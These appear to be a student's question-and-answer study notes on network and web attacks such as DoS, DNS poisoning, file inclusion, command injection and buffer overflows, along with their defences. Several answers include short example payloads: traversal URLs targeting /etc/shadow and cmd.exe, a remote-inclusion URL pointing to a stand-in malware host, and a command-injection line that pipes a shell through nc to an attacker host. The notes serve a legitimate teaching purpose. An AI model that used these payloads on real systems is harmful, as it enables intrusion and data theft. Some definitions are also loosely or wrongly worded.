Malicious activity

Question 1

What are few Denial Of service attacks?

Answer 1

1. SYN flood
2. Amplified DNS attack
3. Ping flood
4. PDOS (Permanent Denial Of Service)
5. Fork Bomb - in this attack, a process replicates into multiple processes within a memory and taking up all the memory resource of a system until it crashes. Fork refers to a process here.
6. DDOS attack -

Question 2

What are few prevention measures against DDOS attacks?

Answer 2

1. Implement IPS (Intrusion prevention System)
2. Black-hole/sinkhole
3. Elastic Cloud Infrastructure

Question 3

What is DNS cache poisoning attack?

Answer 3

In this attack, a threat actor inserts malicious DNS entries (Domains pointing to Malicious IPs) into DNS resolver.

Protection techniques -

1. Use DNSSEC (DNS Security Extension) - In this technique, DNS responses that DNS resolved get from other DNS servers are sent with cryptographic signatures.
2. Implement good security measures for protecting DNS resolver.

Question 4

What is DNS amplification attack?

Answer 4

In this attack, an attacker spoofs the IP of a victim and sends some command to DNS server requesting data.
DNS server/resolver responses back with large amount of DNS data that overwhelms the victim device.

Question 5

What is DNS tunnelling attack?

Answer 5

In this attack, an attacker wraps some other protocol Data like HTTP, SSH inside the DNS data to cross through firewall rules.
They might do it to exfiltrate data or command control.

To protect from it, analyze DNS log data.

Question 6

What is Domain Hijacking attack?

Answer 6

It is an attack in which an attacker takes over someone’s else domain.
They might to deface the domain or to infect users who visit this site.

To protect from it, we should protect registration account information.

Question 7

What is DNS Zone transfer attack?

Answer 7

In this attack, an threat actor mimics an authorized system to request and obtain the entire DNS Zone data for a domain.

This kind of attack can expose sensitive data about a network like their network architecture.

Question 8

What is a directory Traversal attack?

Answer 8

In this attack, a threat actor is able to access unauthorized files /folder/commands either in the Web-document root directory or in some other folder on the same server that has Web-document root directory.

Here is an example of directory traversal -

https://diontraining.com/../../../etc/shadow

Question 9

What is an inclusion attack?

Answer 9

Inclusion attack - In this attack, a threat actor is able to include some file in the application and eventually get the application to run this malicious file.

Example - threat actor might include a file into a web application and run this malicious file on the server which might lead to data theft, unexpected actions taking place on server or run some arbitrary code on the server.

It is of 2 types -

1. Remote File inclusion -
   2.Loacl File inclusion

Question 10

What is remote file inclusion attack?

Answer 10

In this attack, a threat actor finds a file inclusion vulnerability in an application and is able to include a remote file into an application (Most often a web-application).
Once file is included, web-server application might runs this malicious file.

Example -

https://diontraining.com/login.php?user=http://malware.bad/malicious.php

Question 11

What is local file inclusion?

Answer 11

In this malicious activity or attack, a threat actor tries to include a file that already exists on the server host.

How can a file already be existing on the web-server?
- the webpage might have some online form that accepts file and attacker might be have to upload a malicious file into the server host.

So in this attack, a threat actor attempts to make the web-server application run this locally-included file.
Normally this includes Directory Traversal -

Example -
https//:diontraining.com/login.php?user=../../windows/system32/cmd.exe%00

Question 12

What is an arbitrary code execution attack?

Answer 12

This attack takes place when an attacker is able to run any malicious code/command of his own choice on the target system.

How does an attacker do it -
They exploit some vulnerability in the web application/system or network such a buffer Overflow, Injection attacks, File inclusion attacks etc.

If this malicious code is executed remotely, it is know as remote arbitrary code execution.

Question 13

What is an privilege escalation attack?

Answer 13

This is an attack in which an attacker is able to escalate his privileges to a system resource. Example - gaining write permission instead of having only read permissions.

2 types -

Vertical privilege escalation - Like increasing permission levels from user account to admin account.

Horizontal privilege escalation - Like switching from 1st account permissions to seconds where both are user accounts but 2 account has access to a certain file or resource in the system.

Question 14

What are 2 main kinds of root-kits?

Answer 14

Kernel Level rootkit and
User mode root kit

Question 15

How can we protect from File Inclusion attacks?

Answer 15

1. Sanitize user input
2. Perform user input validation
3. Implement proper access controls for every account including Web service account (for the users who is accessing the web-server)

Question 16

What is a cookies poisoning attack and how we can protect from it?

Answer 16

It is the process of modifying the contents of a cookies (after it has been created by the server for sending to client’s browser) and the exploit the vulnerabilities in the web application.

How can we protect form it:
1. Encrypt cookies
2. Delete cookies when session is done

Question 17

What are on-path attacks?

Answer 17

This is an attack in which an attacker inserts himself in the middle of authenticated session between client and the web server.
Doing so, he can capture, monitor and analyze the traffic between client and the web-server.

An attacker can accomplishes this attacker by playing a downgrade attack.

Question 18

What is SSL Stripping attack?

Answer 18

In this attack, the attacker tricks the encryption application with an HTTP connection instead of an HTTPS connection.

Question 19

What is LDAP injection attack?

Answer 19

It is similar to SQL injection attack.
In this attack, an attacker exploits some vulnerability in the LDAP protocol.
Normally this attack takes place on the websites that use LDAP protocol to authenticate users (using a web application sign in page that uses LDAP protocol on the back end).
So in this attack, an attacker sends a malicious LDAP command/statement to the server.

Protection technique -
1. Do input sanitization
2. Do input validation

Question 20

What is an command injection attack?

Answer 20

In this attack, a threat actor is able to execute an arbitrary shell command via a vulnerable web application.

Ex - Remember the scenario !!!! checking the ping !!!!

diontraining.com && /bin/sh |nc hacked.diotraining.com 443

Question 21

What is process injection attack?

Answer 21

It is a method of executing arbitrary code in the address space of a separate live process.
Process injection attacks are commonly used in malware, rootkits, and advanced persistent threats (APTs) to evade detection and maintain persistence on compromised systems.

Learn more about these later. Use ChatGPT.

Question 22

What is a Software Weakness?

Answer 22

A software weakness refers to a flaw or defect in the design, implementation, or configuration of software that can potentially lead to security vulnerabilities.

Examples of software weaknesses include buffer overflows, input validation errors, lack of proper authentication mechanisms, insecure configuration settings, etc.

These can be prevented using secure coding practices.

Question 23

What is the difference between Software Weakness and Vulnerability?

Answer 23

software weaknesses are generic flaws or defects in software that could potentially lead to vulnerabilities, while vulnerabilities represent specific instances of weaknesses that can be exploited by attackers to compromise the security of a system.

Question 24

What is CWE?

Answer 24

It stands for Common Weakness Enumeration. It is a database or table that is managed by Mitre to keep track of common software weakness.
It provides a common language (a structured format) to define these Software Weaknesses.

Question 25

What are 2 most common indicators of On-path attack (Man-in-the-middle attack)?

Answer 25

1st indicator is there can be delay in our session (as first our traffic goes through the on-path computer who might decrypt/encrypt data and then passes on to the server).

2nd indicator is that out browser might not show the lock icon besides the URL and there can be certificate warning as the certificate is not signed by the CA (Certificate authority).

Question 26

What is Man-in-the-browser attack?

Answer 26

In this attack, an attacker exploits some vulnerability in the browser and is able to remotely connect to browsers and can modify, collect the session information. He can also capture keystrokes and might be able to steal user’s password for different accounts.

 This attack is normally initiated by sending the malicious link to user and tricking the user to click on it to run the malicious script to exploit vulnerability in the browser.

Question 27

What is a DNS sinkhole?

Answer 27

DNS sinkhole is a specific record in a DNS server that does not give the correct result for a DNS name resolution request. Normally this is used by investigative authorities to stop the botnet or some malware to connect to the command and Control server. Usually malwares have domain names of command and control server that they connect to.

Question 28

What is the most effective counter measure against replay attack?

Answer 28

Use of Timestamps and sequence numbers

Question 29

How can we investigate script related acttcks?

Answer 29

Using logs

Question 30

A note on scripting attack

Answer 30

PowerShell cmdlets use verb-noun structure such as Invoke-Command. Bash scripts typically call either /bin/bash or /bin/sh. If logs show Verb-noun cmdlets or calls to bash or sh, it may be a potential indicator.

Question 31

What are some of the common verbs and common nouns used in PowerShell?

Answer 31

Common verb - Get, Add, Test, Remove, New, Find, and Move

Common noun - Command, Service, Location, Process, Childiterm, WMiObject, PSDrive

WMI stands for Windows Management Instrumentation.

Question 32

What is memory leak?

Answer 32

It is a bug in a computer program that makes the program use more and more memory the longer it runs.

It is possible to detect memory leaks by looking at the memory usage per application in operating system tools such as Windows Task Manager.

Question 33

What is Buffer Overflow attack?

Answer 33

In these attacks, an attacker sends large amount of data to the application than it can handle, which results in buffer over flow.

This large amount of data normally has NOPs (No operations that tell the system/OS to go to the next memory location and execute the code over there)
and malicious script at the end of NOPs.

Using these NOPs, an attacker can make the system execute malicious script in the memory.